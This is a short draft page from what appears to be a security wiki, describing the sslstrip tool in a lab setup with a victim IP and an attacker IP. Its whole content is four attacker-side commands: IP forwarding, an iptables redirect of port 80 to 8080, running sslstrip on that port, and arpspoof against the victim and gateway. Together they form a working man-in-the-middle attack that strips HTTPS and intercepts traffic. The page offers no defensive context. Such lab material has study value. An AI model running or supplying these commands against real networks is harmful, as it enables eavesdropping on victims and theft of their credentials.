Sslstrip

From aldeid
Jump to navigation Jump to search
DRAFT
This page is still a draft. Thank you for your understanding.
  • Victim 192.168.100.42
  • Attacker 192.168.100.45

From the attacker's machine:

# echo "1" > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# python sslstrip.py -s -l 8080
# arpspoof -i wlan0 -t 192.168.100.42 192.168.100.1